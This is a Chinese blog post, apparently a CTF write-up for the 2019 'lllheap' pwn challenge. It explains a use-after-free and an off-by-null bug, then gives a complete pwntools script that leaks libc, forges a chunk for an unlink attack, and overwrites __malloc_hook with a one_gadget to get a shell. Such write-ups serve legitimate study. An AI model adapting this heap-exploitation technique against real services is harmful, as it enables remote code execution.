2019 省赛lllheap unlink解法总结

最新推荐文章于 2022-09-09 20:07:19 发布
最新推荐文章于 2022-09-09 20:07:19 发布
阅读量259 收藏
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/103483140
版权

在free函数时有个明显的UAF漏洞
在这里插入图片描述
但是麻烦的是程序限制了创建的chunk的大小只能是0x100或0x150, 所以无法通过fastbin attack之类的方法来解题
但是可以利用unlink来构造fake chunk的地址为__malloc_hook的地址, 从而写入one_gadget来getshell

具体分析:
如果只存在一个UAF漏洞应该是无法利用unlink解题的(也许还有别的方法, 我太菜了想不出来, 这题还存在一个逻辑漏洞
在这里插入图片描述
如果输入chunk的data大小为0x100的话, 那么下一个chunk的prev_size 的低位字节会被置为零, 所以可以在上一个chunk伪造fake_chunk来触发unlink从而改变bss段中的chunk地址为__malloc_hook, 之后写入one_gadget来getshell
在这里插入图片描述
在这里插入图片描述
EXP:

# --- coding: UTF-8 ---

from pwn import *
import sys
import os

context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
#context(arch='i386', os='linux', terminal=['tmux', 'splitw', -h'])
context.log_level='debug'
debug = 1
d = 1

def pwn():
	execve = "./lllheap"
	if debug == 1:
		p = process(execve)
		if d == 1:
			gdb.attach(p)
	else:
		#ip = "10.0.%s.140" % sys.argv[1]
		ip = "1.1.5.100"
		#host = ""
		host = 10000
		p = remote(ip, host)
	
	def add(size):
		p.sendlineafter("choice:", str(1))
		p.sendlineafter("size:", str(size))
		
	def show(idx):
		p.sendlineafter("choice:", str(2))
		p.sendlineafter("index:", str(idx))

	def edit(idx, content):
		p.sendlineafter("choice:", str(3))
		p.sendlineafter("index:", str(idx))
		p.sendlineafter("content:", content)
	
	def free(idx):
		p.sendlineafter("choice:", str(4))
		p.sendlineafter("index:", str(idx))
	
	add(0x100) #0
	add(0x100) #1
	add(0x100) #2
	
	free(1)
	show(1)
	libc = ELF("lll_libc.so.6")
	leak = u64(p.recvline()[:6].ljust(8, '\x00'))
	libc_base = leak - 0x3c4b78
	malloc_hook = libc_base + libc.symbols['__malloc_hook']
	one_gadget = [libc_base+0x45216, libc_base+0x4526a, libc_base+0xf1147, libc_base+0xf02a4]
	print "libc_base -> " + hex(libc_base)

	fake_addr = 0x602070
	payload = p64(0) + p64(0x101) + p64(fake_addr - 0x18) + p64(fake_addr - 0x10) + 'a'*(0x100 - 32)
	edit(1, payload)
	
	#unlink
	free(2)
	payload = p64(0) + p64(malloc_hook)
	edit(1, payload)
	
	edit(0, p64(one_gadget[2]))
	add(0x100)
	
	p.interactive()	

if __name__ == '__main__':
	pwn()

result
在这里插入图片描述

苍崎青子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2667
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
一道题彻底理解 Pwn Heap Unlink
Ms08067安全实验室
12-20 845
基本原理unlink是一个宏操作,用于将某一个空闲 chunk 从其所处的双向链表中脱链,我们来利用unlink 所造成的漏洞时,其实就是对进行 unlink chunk 进行内存布局,...
2019山东(部分题解)
zufesatoshi的博客
05-28 596
A #include<iostream> #include<cstring> #include<cstdio> #include<queue> #include<cstdlib> #include<cmath> #include<stack> #include<map> #include<stri...
CTF PWN之heap入门 unlink
L2329794714的博客
09-09 1638
unlink的利用需要申请连续的chunk,为了方便我们先要让IO两个缓冲区都申请了,即程序执行至少以此IO输出,一次IO此输入(这里可以让程序执行一遍创建堆块的流程实现),后面再创建两个相邻的堆块,后面一个大小大于0x80,再前一个堆块里伪造一个释放状态的chunk,并利用堆溢出改写后一个chunk的P_size(伪造chunk的大小包括chunk头),和size(in_user为为0),然后free后面的chunk来触发前合并,从而进行unlink。P:为要取出的chunk指针(指向chunk头的)
2019 D^3CTF new_heap详细题解
seaaseesa的博客
11-28 1453
new_heap(高质量题) 这题是2019 d3ctf的一题,当时没做出来,后来看了大佬的exp脚本,慢慢研究,终于明白了原理,现在,我们就来详细的解析一下这题 首先,我们还是检查一下程序的保护机制,保护全开 再看一下给我们的libc.so.6的版本,可见是glibc2.29,那么对于堆的管理,就存在tcache机制 程序只有简单的3个功能,没有show,也没有edit,这让我...
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
Linux unlink函数和删除文件的操作方法
01-09
1. unlink函数   对于硬链接来说,unlink 用来删除目录项,并把 inode 引用计数减 1,这两步也是一个原子过程。直到 inode 引用计数为 0,才会真正删除文件。   对于软链接来说,unlink 直接删除软链接,而不...
node.js中的fs.unlink方法使用说明
10-25
主要介绍了node.js中的fs.unlink方法使用说明,本文介绍了fs.unlink的方法说明、语法、接收参数、使用实例和实现源码,需要的朋友可以参考下
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
`unlink()`, `mkdir()`, 和 `rmdir()` 是三个关键的函数,用于处理文件和目录的操作。下面将详细介绍这三个函数的用法和注意事项。 1. **unlink() 函数**: `unlink()` 用于删除指定的文件。其基本语法是 `unlink...
[CTF]Heap vuln -- unlink
weixin_30568591的博客
02-15 121
0x00: 起因 一直在堆的漏洞利用中不得要领,之前ZCTF又是三个堆的利用,血崩,chxx表哥给写了一个heap的pwn,学习学习。 0x01: 关于heap的unlink的漏洞利用,出的很早,在低版本的libc中,因为没有校验,导致在unlink的时候可以通过构造堆块dwordshoot,从而任意代码执行。 对于这种漏洞的学习,首先要了解malloc的工作原理及几种堆块的分配、使用方式。推荐文...
2019年第十届“浪潮杯”山东大学生ACM程序设计竞--解题报告
AAAAAAAC的博客
05-13 1662
目录 A、 calandar B、Flipping Game C、Wandering Robot D、Game on a Graph E、BaoBao Loves Reading F、Stones in the Bucket G、Heap, H、Tokens on the Segments I、Connected Intervals J 、riangle City K、Ha...
2017 火种CTF Writeup
4ct10n
07-06 6103
趁着周日的时间打了个小比。。。。
【PWN-HEAP】Unlink学习笔记
SWEET0SWAT的博客
09-02 776
题目练习 HITCON2016 bamboobox 反编译情况: 程序分析
ptmalloc heap unlink exploit
MillionSky的专栏
05-21 639
1 概述Heap unlink exploit 前提是要对ptmalloc堆有一定的了解。2 UnlinkUnlink:用来将一个双向 bin 链表中的一个 chunk 取出来参数:AV:arena header(malloc_state)P :将要unlink的chunkBK:P后面的chunk    &lt;--FD:P前面的chunk    --&gt;具体过程如下:将chunk从FD/B...
linux heap unlinking分析
小强的博客
08-24 674
虽然这个技术已经不能在新版本上使用了,但是还是有许多学习价值的。 刚开始学,与大家分享一下,直说自己不是很明白的几个点,然后是参考的文章。 实例代码如下: /* Heap overflow vulnerable program. */ #include #include int main( int argc, char * argv[] ) {
Heap-Unlink一谈
qq_41252520的博客
08-12 409
前话 原理在这就不说了,很多博主说得都非常的详细,我也是从他们那里学到的。本篇主要就是讲解常见的Unlink利用。主要分为有泄漏操作和无泄漏操作。 有泄漏操作就是能够输出堆中的信息,无泄漏就是不能泄露堆中的信息。 有泄漏操作 ZCTF-2016-note2 【保护】: RELRO保护一定要非常注意,如果是这种情况下(部分开启),说明任意函数的got表都可写;如果是完全开启(FULL)...
i春秋上的几道pwn题
sopora的博客
06-17 1722
01.pwnme-50: Tag: fmtstr任意读 / 整型溢出 / ret2csu_init #encoding:utf-8 from pwn import * #context.log_level = 'debug' def leak(addr): io.sendafter('>', '2') io.sendafter('username...
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4862
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3008
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
unlink pwn
最新发布
08-25
总结起来,"unlink"攻击利用了堆溢出漏洞中的"Use-After-Free"漏洞,并通过修改堆块的前后指针来实现对程序的控制。这是一种常见的攻击技术,需要仔细的堆结构分析和理解。<span class="em">1</span><span class="em...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值